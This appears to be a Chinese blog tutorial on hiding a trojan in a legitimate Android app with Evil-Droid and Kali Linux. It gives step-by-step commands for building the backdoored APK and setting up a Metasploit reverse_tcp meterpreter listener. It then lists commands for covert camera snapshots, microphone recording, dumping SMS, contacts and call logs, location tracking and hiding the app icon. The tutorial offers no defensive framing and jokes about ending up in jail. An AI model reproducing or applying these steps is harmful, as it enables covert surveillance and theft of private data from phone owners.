一 、目标

1，实现简单的android渗透，理解原理。
2，可以获取目标手机的内容

二、准备材料

1，kali虚拟机 (我的是2020.4版)
2，手机模拟器
3，Evil-Droid-master（可自己去github下载）
4，一个小app安装包（test.apk）

三、开始

将材料放到kali里面，如下图

更换apktool.jar版本，默认2.3（至少为2.4，自己到网上找吧）

开始搞事情
切换目录

cd Evil-Droid-master

切换到root状态下

su root

安装zipalign库（安装过就不用了）

apt-get install zipalign

授予文件运行权（之前搞过就不用了）

chmod +x evil-droid

运行

./evil-droid    

出现下面的即为成功，如有爆红，就是没有安装相应的包，一路确认安装即可

点击“是”

输入“3”

输入您的IP，记住您的IP，之后有用

随便输入一个端口，但是要记住，之后有用

设置生成的木马apk的名字

选如图

选要植入木马的apk

接下来，一直等…
突然想到：kali学的好，局子蹲到老，hhhh

出现下面这样就算成功。

看一下apk路径，点击确定

按图操作

启动msfconsole

msfconsole

设置监听
下面的要一行一行的执行

use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.1.54 //你的ipset LPORT 4444  //你的端口exploit

找到木马apk，安装在android里面

其实就是“一个木X”app，他的功能可以正常用，但是一旦运行，我们的木马也自动运行

双击运行

好了，在kali里面可以对这个手机操作了，具体操作看下面命令

webcam_list  //列出网络摄像头webcam_stream //开启摄像头webcam_snap //隐秘拍照功能    record_mic [ˈrekərd] /记录/  从默认麦克风录制音频为X秒    webcam_chat  开始视频聊天    webcam_snap  从指定的摄像头获取快照    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]Android Commands=================    activity_start  从URI字符串启动Android活动    check_root  检查设备是否有根    dump_calllog  获取调用日志    dump_contacts  获取联系人列表    dump_sms  获取短信    geolocate  利用地理定位获取当前LAT    wlan_geolocate  利用WLAN信息获取当前LAT    hide_app_icon  从发射器隐藏应用程序图标    interval_collect  管理区间收集能力    send_sms  从目标会话发送短消息    set_audio_mode    sqlite_query  从存储库查询SQLite数据库    wakelock  启用/禁用Wakelock可以输入?查看更多命令

四、总结

kali学的好，局子蹲到老，hhhh

更多相关文章

1. 【阿里云镜像】切换阿里巴巴开源镜像站镜像——Debian镜像
2. Android屏幕分辨率正确获取及PX,DPI,DP,SP等的对应关系
3. android 获取唯一标识
4. android拍照与读取相册
5. Android(安卓)热点开关状态的判断和获取热点ssid
6. Android软键盘适配问题
7. AIR Native Extension的使用(Android)一 : 打包ane
8. android之BitMap
9. Android中GPS定位的简单应用

随机推荐

1. Greenplum6 数据库数据库学习_外部表
2. 【DB笔试面试536】在Oracle中，Oracle 10g
3. 【DB笔试面试842】在Oracle中，如何启动Ora
4. 【DB笔试面试444】Oracle中PL/SQL的流程
5. 【DB笔试面试223】在Oracle中，如果丢失一
6. 记录一次宕机后，OGG出现故障，OGG-01705的解
7. 靶机***之Typhoon实战
8. Facebook是如何通过Android应用程序跟踪
9. [原创干货]Oracle Sharding实施教程来袭！！！
10. 浅谈SaaS和企业端应用的集成